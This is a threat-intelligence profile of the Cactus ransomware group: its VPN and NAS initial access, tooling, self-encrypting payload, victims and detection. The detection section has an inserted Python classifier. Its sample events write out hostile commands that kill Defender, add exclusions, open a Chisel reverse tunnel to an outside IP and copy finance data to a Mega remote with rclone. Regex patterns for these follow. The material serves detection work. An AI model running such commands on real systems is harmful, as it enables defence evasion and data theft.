
Cactus Ransomware: Self-Encrypting Payloads, VPN Exploitation, and Enterprise Targeting

Cactus has operated since March 2023, distinguishing itself through an anti-analysis technique that encrypts its own binary until execution time and a targeting pattern focused on large enterprise organisations. This profile covers TTPs, initial access methods, notable victims, and detection.

By Ransomware Tracker
Tags: Cactus, ransomware, VPN, Fortinet, self-encrypting, double extortion, enterprise, Schneider Electric, QNAP, 2026
Threat Level: 8/10
Sectors Targeted: manufacturing, energy, retail, financial-services, technology, professional-services
Ransomware Family: Cactus

Overview

Cactus is a ransomware operation that emerged in March 2023 and quickly established itself as an enterprise-focused threat, targeting large organisations across manufacturing, energy, retail, and professional services. Unlike many contemporaries who built their profile through high victim volume, Cactus has pursued a strategy of selectivity — fewer attacks, larger targets, and demands calibrated to victim revenue rather than a flat rate.

The group’s defining technical characteristic is a self-encryption mechanism for its encryptor binary: the ransomware payload is encrypted at rest and requires a command-line argument containing the decryption key to execute. This approach was unusual at launch and designed specifically to frustrate automated sandbox analysis — a submitted sample without its key simply does not run and reveals nothing.

Cactus operates a double-extortion model with a leak site and has been observed conducting triple extortion on high-value victims, contacting customers or partners of the victim to increase pressure on negotiation timelines.

Background

Cactus does not appear to be a direct rebrand or continuation of any prior group. Code analysis has not established clear lineage to predecessors such as BlackCat/ALPHV or Hive. The group operates an affiliate model, though it is less openly advertised than some RaaS programmes — recruitment appears to occur through private channels rather than forums.

The name refers to the group’s leak site branding and appears in ransom note headers and in the binary’s embedded strings. The group has been tracked by Kroll, Arctic Wolf, Trend Micro, and Tenable, all of whom have published technical reporting on intrusions.

Initial Access: VPN and Network Device Exploitation

Cactus’s consistent initial access method is exploitation of VPN appliances and network edge devices — particularly those running unpatched software. Documented vectors include:

Fortinet VPN vulnerabilities — CVE-2023-41671 and related FortiOS authentication bypass vulnerabilities have appeared in post-incident reporting from multiple Cactus intrusions. The group targets internet-exposed FortiGate appliances with credential stuffing and vulnerability exploitation. Unpatched instances running FortiOS versions affected by the SSL-VPN path traversal vulnerabilities remain priority targets.

QNAP NAS devices — In several intrusions, Cactus obtained initial access via internet-exposed QNAP network-attached storage devices. QNAP devices running outdated firmware have known authentication bypass and remote code execution vulnerabilities that give unauthenticated attackers a foothold into the internal network from a device that is often inadequately monitored.

Purchased access from initial access brokers — Forensic evidence from Kroll-investigated intrusions indicates that some Cactus affiliates purchase valid VPN credentials from access brokers rather than exploiting vulnerabilities directly. This is consistent with the broader RaaS ecosystem where initial access and post-exploitation are increasingly separate commercial services.

Post-Compromise Tradecraft

Once inside, Cactus intrusions follow a pattern common to enterprise ransomware operations but with several notable characteristics:

Persistence and lateral movement via legitimate tooling. Cactus operators use a combination of tools that are individually legitimate: Chisel for network tunnelling, AnyDesk and Splashtop for remote access, PSnmap (a PowerShell-based network scanner) for internal reconnaissance, and scheduled tasks for persistence. The reliance on tools with legitimate uses makes detection harder on environments that already use remote management software.

Active defence evasion. Before deploying the encryptor, Cactus operators typically attempt to disable endpoint detection and response tools. This is done through a combination of batch scripts that stop known security software services, manipulation of Windows Defender exclusions, and in some cases use of the AV-killer capabilities in tools like PCHunter or IObit Unlocker.

Exfiltration before encryption. Data is staged and exfiltrated to attacker-controlled infrastructure before encryption begins. Cactus has been observed using rclone for exfiltration, configured to send data to cloud storage services. Exfiltration volume in confirmed intrusions has ranged from tens of gigabytes to multiple terabytes.

The self-encrypting encryptor. The Cactus encryptor is distributed as an AES-encrypted binary. Execution requires a command-line argument (a key) that decrypts the payload in memory before it runs. The binary submitted to a sandbox without the key is opaque — it does not decrypt, does not execute, and does not exhibit ransomware behaviour. This is a targeted anti-analysis measure rather than a defence against incident response on live systems, where the key is present in the execution command.

Encryption combines RSA-4096 for key protection with AES-256 for file encryption. Encrypted files receive the .cts1 extension (early versions) or .cactus extension in later variants.

Notable Victims

Schneider Electric (November 2023) — The most high-profile confirmed Cactus victim is Schneider Electric, a multinational industrial automation and energy management company. Cactus claimed to have stolen approximately 1.5 terabytes of data from Schneider Electric’s Sustainability Business division, which provides energy management and sustainability reporting software to enterprise customers. The breach exposed customer data including names, email addresses, and service usage information. Schneider Electric confirmed the attack and isolated the affected environment.

Petrofac (2024) — The UK-headquartered oilfield services company confirmed a Cactus intrusion affecting internal systems. Petrofac operates across the oil and gas value chain in the Middle East, North Africa, and Europe, making it a high-value target both for ransom and for the commercially sensitive project data it holds.

Swedish retailer Brafab (2024) — Cactus claimed Swedish furniture and garden retailer Brafab as a victim, publishing samples of internal financial documents on its leak site as proof of access.

The group’s victim set skews toward companies in the €100M+ revenue bracket, with sector concentration in manufacturing, industrial services, and retail.

Detection

Cactus intrusions produce several detectable signals:

Initial access. Monitor VPN authentication logs for credential stuffing patterns — high-volume authentication attempts from diverse IP addresses against SSL-VPN interfaces, particularly outside business hours. QNAP devices should be isolated from direct internet exposure; any authentication to an internet-facing NAS should be treated as high-risk.

Lateral movement. PSnmap activity from non-standard hosts (servers, workstations that do not normally run network scanning tools) is a strong indicator of post-compromise reconnaissance. Chisel binary execution — particularly with listening or reverse-tunnel arguments — on endpoints that do not legitimately use it should alert.

Exfiltration. Rclone execution from unusual paths or with cloud storage destination arguments is a high-fidelity signal. Monitor for large outbound data transfers to cloud storage providers (particularly Mega.nz, which has appeared in Cactus exfiltration) from internal hosts.

Pre-encryption. Batch script execution that terminates security software services (stopping AV/EDR process names) and modifies Windows Defender exclusion lists are documented pre-encryption indicators in Cactus intrusions.

# High-value detection — security tool termination batch scripts
# Requires Event ID 4688 with command-line auditing enabled. Windows Event Log XPath has no
# substring or wildcard match, so select on EventID only and filter the command line afterwards.
wevtutil qe Security /q:"*[System[(EventID=4688)]]" /f:text | findstr /i /c:"taskkill" | findstr /i /c:"/F"
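The detection signals above (AV/EDR termination, Defender exclusion tampering, Chisel reverse tunnels, rclone to a cloud remote, PSnmap from non-scanner hosts) expressed as SIEM-side logic over process-creation records. This is an added example, not code from the original profile or from any of the cited vendors; the event records are constructed, and the host allowlists and security process names are assumptions for illustration.

```python
import re

# Constructed sample of Windows 4688 process-creation records as (host, command line).
# Illustrative only; not captured from a real Cactus intrusion.
SAMPLE_EVENTS = [
    ("WS-042", r"taskkill /F /IM MsMpEng.exe"),
    ("WS-042", r"taskkill /F /IM notepad.exe"),
    ("SRV-FS01", r'powershell -c "Add-MpPreference -ExclusionPath C:\Temp"'),
    ("SRV-DB02", r"C:\Users\Public\chisel.exe client 203.0.113.10:8080 R:socks"),
    ("SRV-FS01", r"C:\Users\Public\rclone.exe copy D:\Finance mega:exfil --transfers 16"),
    ("SRV-FS01", r"powershell -File C:\Users\Public\PSnmap.ps1 -ComputerName 10.0.0.0/24"),
    ("BACKUP01", r"rclone sync D:\Backups offsite:vault"),
]

# Assumed environment knowledge: lowercase names of security processes worth protecting,
# and hosts with a legitimate rclone deployment or scanning role (tune per environment).
SECURITY_PROCESSES = {"msmpeng.exe", "mssense.exe"}
RCLONE_HOSTS = {"BACKUP01"}
SCANNER_HOSTS = {"VULNSCAN01"}


def classify(host, cmdline):
    """Return (rule, severity) tags for one 4688 record; [] when nothing matches."""
    cl = cmdline.lower()
    hits = []
    # Pre-encryption: forced termination of a security process via taskkill /F /IM <name>
    m = re.search(r"taskkill\b.*?/f\b.*?/im\s+(\S+)", cl)
    if m and m.group(1) in SECURITY_PROCESSES:
        hits.append(("av_edr_termination", "high"))
    # Pre-encryption: Defender exclusion list changed through Add-/Set-MpPreference
    if re.search(r"(add|set)-mppreference\s.*-exclusion(path|process|extension)", cl):
        hits.append(("defender_exclusion_change", "high"))
    # Lateral movement: Chisel in listening (server) or reverse-tunnel (client ... R:) mode
    if re.search(r"chisel(\.exe)?\s+(server\b|client\b.*\br:)", cl):
        hits.append(("chisel_reverse_tunnel", "high"))
    # Exfiltration: rclone copy/sync/move to a named remote (remote:path, not a drive letter
    # or URL) from a host not approved for rclone use
    if host not in RCLONE_HOSTS and re.search(
            r"rclone(\.exe)?\s+(copy|sync|move)\b.*\s[a-z0-9_-]{2,}:(?!//)", cl):
        hits.append(("rclone_exfil", "high"))
    # Reconnaissance: PSnmap on a host that does not normally run network scanners
    if "psnmap" in cl and host not in SCANNER_HOSTS:
        hits.append(("psnmap_recon", "medium"))
    return hits


def scan(events):
    """Run every record through classify(); returns {host: [rule names]} for hosts with hits."""
    alerts = {}
    for host, cmdline in events:
        for rule, _severity in classify(host, cmdline):
            alerts.setdefault(host, []).append(rule)
    return alerts
```

Running `scan(SAMPLE_EVENTS)` flags the workstation killing Defender, the file server showing three separate stages (exclusion change, rclone to a Mega remote, PSnmap) and the Chisel reverse tunnel, while the approved backup host's rclone job stays silent.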

Ransom and Negotiation

Cactus ransom demands are calibrated to victim size. In publicly reported cases, demands have ranged from low seven figures to over $15 million USD for large enterprises. The group maintains a negotiation team accessible via the leak site and via Tox. Payment deadlines are typically 72 hours before data begins being published, with the initial publication being a sample set to establish credibility.

Current Activity

Cactus remained active through mid-2026, with new victims appearing on the leak site at a rate of approximately two to four per month — consistent with its enterprise-focused, lower-volume approach. The group has not been publicly disrupted by law enforcement and has not changed its branding or apparent operational structure since launch.

The group’s willingness to target industrial and manufacturing firms — and its demonstrated access to Schneider Electric environments — places it on the watch list for OT-adjacent risk teams, particularly those concerned about ransomware propagating from IT networks into connected OT environments.
